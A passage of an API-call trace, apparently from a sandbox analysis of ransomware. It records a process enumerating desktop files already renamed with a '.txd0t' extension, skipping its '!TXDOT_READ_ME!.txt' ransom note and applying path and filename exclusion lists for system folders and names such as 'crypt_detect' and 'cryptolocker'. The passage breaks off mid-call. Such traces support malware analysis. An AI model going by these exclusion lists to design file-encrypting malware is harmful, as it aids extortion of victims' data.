dwReserved1=0x0, cFileName="PYzrJzKfYy0WH.jpg.txd0t", cAlternateFileName="PYZRJZ~1.TXD")) returned 1 [0129.185] StrCmpW (psz1="PYzrJzKfYy0WH.jpg.txd0t", psz2=".") returned 1 [0129.185] StrCmpW (psz1="PYzrJzKfYy0WH.jpg.txd0t", psz2="..") returned 1 [0129.185] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.185] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.185] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="PYzrJzKfYy0WH.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t" [0129.186] PathFindExtensionW (pszPath="PYzrJzKfYy0WH.jpg.txd0t") returned=".txd0t" [0129.186] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.186] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61d5de10, ftCreationTime.dwHighDateTime=0x1d5eecd, ftLastAccessTime.dwLowDateTime=0x46bf2c70, ftLastAccessTime.dwHighDateTime=0x1d5e7ad, ftLastWriteTime.dwLowDateTime=0x509cf504, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7a3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="rBWrlFNmCY.bmp.txd0t", cAlternateFileName="RBWRLF~1.TXD")) returned 1 [0129.186] StrCmpW (psz1="rBWrlFNmCY.bmp.txd0t", psz2=".") returned 1 [0129.186] StrCmpW (psz1="rBWrlFNmCY.bmp.txd0t", psz2="..") returned 1 [0129.186] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.186] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.186] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="rBWrlFNmCY.bmp.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t" [0129.186] PathFindExtensionW (pszPath="rBWrlFNmCY.bmp.txd0t") returned=".txd0t" [0129.186] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.186] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37d9fe90, ftCreationTime.dwHighDateTime=0x1d5e7c3, ftLastAccessTime.dwLowDateTime=0xf24c1b0, ftLastAccessTime.dwHighDateTime=0x1d5efd4, ftLastWriteTime.dwLowDateTime=0x50a8df2a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x171ce, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="RnjQ5ZSPpYJwR3B.jpg.txd0t", cAlternateFileName="RNJQ5Z~1.TXD")) returned 1 [0129.186] StrCmpW (psz1="RnjQ5ZSPpYJwR3B.jpg.txd0t", psz2=".") returned 1 [0129.186] StrCmpW (psz1="RnjQ5ZSPpYJwR3B.jpg.txd0t", psz2="..") returned 1 [0129.186] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.186] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.186] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="RnjQ5ZSPpYJwR3B.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t" [0129.186] PathFindExtensionW (pszPath="RnjQ5ZSPpYJwR3B.jpg.txd0t") returned=".txd0t" [0129.186] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.186] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3379b30, ftCreationTime.dwHighDateTime=0x1d5eeaa, ftLastAccessTime.dwLowDateTime=0x23f0b1e0, ftLastAccessTime.dwHighDateTime=0x1d5e277, ftLastWriteTime.dwLowDateTime=0x50b022e0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x44c0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="RwNhKXau 7hWtmS6.png.txd0t", cAlternateFileName="RWNHKX~1.TXD")) returned 1 [0129.186] StrCmpW (psz1="RwNhKXau 7hWtmS6.png.txd0t", psz2=".") returned 1 [0129.186] StrCmpW (psz1="RwNhKXau 7hWtmS6.png.txd0t", psz2="..") returned 1 [0129.186] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.186] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.186] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="RwNhKXau 7hWtmS6.png.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t" [0129.186] PathFindExtensionW (pszPath="RwNhKXau 7hWtmS6.png.txd0t") returned=".txd0t" [0129.186] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.186] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeff63820, ftCreationTime.dwHighDateTime=0x1d5e374, ftLastAccessTime.dwLowDateTime=0xff2484f0, ftLastAccessTime.dwHighDateTime=0x1d5ea59, ftLastWriteTime.dwLowDateTime=0x50e9405f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10996, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="s2-ewyNmBK.gif.txd0t", cAlternateFileName="S2-EWY~1.TXD")) returned 1 [0129.186] StrCmpW (psz1="s2-ewyNmBK.gif.txd0t", psz2=".") returned 1 [0129.186] StrCmpW (psz1="s2-ewyNmBK.gif.txd0t", psz2="..") returned 1 [0129.186] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.186] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.186] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="s2-ewyNmBK.gif.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t" [0129.186] PathFindExtensionW (pszPath="s2-ewyNmBK.gif.txd0t") returned=".txd0t" [0129.187] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.187] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685a7a10, ftCreationTime.dwHighDateTime=0x1d5e744, ftLastAccessTime.dwLowDateTime=0xad94c880, ftLastAccessTime.dwHighDateTime=0x1d5ea2b, ftLastWriteTime.dwLowDateTime=0x50f2dc3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11419, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SbwWluUpbQiQnJG8qbe.pdf.txd0t", cAlternateFileName="SBWWLU~1.TXD")) returned 1 [0129.187] StrCmpW (psz1="SbwWluUpbQiQnJG8qbe.pdf.txd0t", psz2=".") returned 1 [0129.187] StrCmpW (psz1="SbwWluUpbQiQnJG8qbe.pdf.txd0t", psz2="..") returned 1 [0129.187] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.187] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.187] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="SbwWluUpbQiQnJG8qbe.pdf.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t" [0129.187] PathFindExtensionW (pszPath="SbwWluUpbQiQnJG8qbe.pdf.txd0t") returned=".txd0t" [0129.187] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.187] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63b7220, ftCreationTime.dwHighDateTime=0x1d5eb85, ftLastAccessTime.dwLowDateTime=0x34ae9370, ftLastAccessTime.dwHighDateTime=0x1d5e91c, ftLastWriteTime.dwLowDateTime=0x50f2dc3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16946, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SJcMEwGL9beIVl4.wav.txd0t", cAlternateFileName="SJCMEW~1.TXD")) returned 1 [0129.187] StrCmpW (psz1="SJcMEwGL9beIVl4.wav.txd0t", psz2=".") returned 1 [0129.187] StrCmpW (psz1="SJcMEwGL9beIVl4.wav.txd0t", psz2="..") returned 1 [0129.187] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.187] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.187] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="SJcMEwGL9beIVl4.wav.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t" [0129.187] PathFindExtensionW (pszPath="SJcMEwGL9beIVl4.wav.txd0t") returned=".txd0t" [0129.187] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.187] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0x5137ec48, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="T2UrA", cAlternateFileName="")) returned 1 [0129.187] StrCmpW (psz1="T2UrA", psz2=".") returned 1 [0129.187] StrCmpW (psz1="T2UrA", psz2="..") returned 1 [0129.187] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.187] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.187] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="T2UrA", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\system32\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\system\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\local\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\boot\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\perflogs\\") returned 0x0 [0129.187] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\programdata\\") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\drivers\\") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\wsus\\") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="crypt_detect") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="cryptolocker") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="ransomware") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\WINDOWS") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.188] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\Program Files") returned 0x0 [0129.188] GetProcessHeap () returned 0xe30000 [0129.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4bc) returned 0xed90d0 [0129.188] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.188] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\*", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*" [0129.188] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0x5137ec48, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.189] StrCmpW (psz1=".", psz2=".") returned 0 [0129.189] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0x5137ec48, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.189] StrCmpW (psz1="..", psz2=".") returned 1 [0129.189] StrCmpW (psz1="..", psz2="..") returned 0 [0129.189] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x510377ec, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x510377ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x510d01cb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.189] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.189] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.189] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.189] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.189] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt" [0129.189] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.189] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.189] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.189] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe15650, ftCreationTime.dwHighDateTime=0x1d5e500, ftLastAccessTime.dwLowDateTime=0xcd226e0, ftLastAccessTime.dwHighDateTime=0x1d5eb39, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1579, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="36V5IRtis-.pps.txd0t", cAlternateFileName="36V5IR~1.TXD")) returned 1 [0129.189] StrCmpW (psz1="36V5IRtis-.pps.txd0t", psz2=".") returned 1 [0129.190] StrCmpW (psz1="36V5IRtis-.pps.txd0t", psz2="..") returned 1 [0129.190] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.190] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.190] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="36V5IRtis-.pps.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t" [0129.190] PathFindExtensionW (pszPath="36V5IRtis-.pps.txd0t") returned=".txd0t" [0129.190] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.190] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa3cba40, ftCreationTime.dwHighDateTime=0x1d5efc5, ftLastAccessTime.dwLowDateTime=0x246cc5d0, ftLastAccessTime.dwHighDateTime=0x1d5e800, ftLastWriteTime.dwLowDateTime=0x51011668, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xddb4, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3dId0lsBJQweABTLa.bmp.txd0t", cAlternateFileName="3DID0L~1.TXD")) returned 1 [0129.190] StrCmpW (psz1="3dId0lsBJQweABTLa.bmp.txd0t", psz2=".") returned 1 [0129.190] StrCmpW (psz1="3dId0lsBJQweABTLa.bmp.txd0t", psz2="..") returned 1 [0129.190] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.190] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.190] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="3dId0lsBJQweABTLa.bmp.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t" [0129.190] PathFindExtensionW (pszPath="3dId0lsBJQweABTLa.bmp.txd0t") returned=".txd0t" [0129.190] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.190] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde3152a0, ftCreationTime.dwHighDateTime=0x1d5efae, ftLastAccessTime.dwLowDateTime=0xc34157f0, ftLastAccessTime.dwHighDateTime=0x1d5eab4, ftLastWriteTime.dwLowDateTime=0x510377ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16e02, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8_rlQ cdl 6S_NtQ4.ods.txd0t", cAlternateFileName="8_RLQC~1.TXD")) returned 1 [0129.190] StrCmpW (psz1="8_rlQ cdl 6S_NtQ4.ods.txd0t", psz2=".") returned 1 [0129.190] StrCmpW (psz1="8_rlQ cdl 6S_NtQ4.ods.txd0t", psz2="..") returned 1 [0129.190] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.190] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.190] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="8_rlQ cdl 6S_NtQ4.ods.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t" [0129.190] PathFindExtensionW (pszPath="8_rlQ cdl 6S_NtQ4.ods.txd0t") returned=".txd0t" [0129.190] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.190] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2df6f500, ftCreationTime.dwHighDateTime=0x1d5e6eb, ftLastAccessTime.dwLowDateTime=0xe2b8a110, ftLastAccessTime.dwHighDateTime=0x1d5e96f, ftLastWriteTime.dwLowDateTime=0x510d01cb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1178d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="9JP3XV6aItTN8Fsv.gif.txd0t", cAlternateFileName="9JP3XV~1.TXD")) returned 1 [0129.190] StrCmpW (psz1="9JP3XV6aItTN8Fsv.gif.txd0t", psz2=".") returned 1 [0129.190] StrCmpW (psz1="9JP3XV6aItTN8Fsv.gif.txd0t", psz2="..") returned 1 [0129.190] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.190] StrNCatW (in: 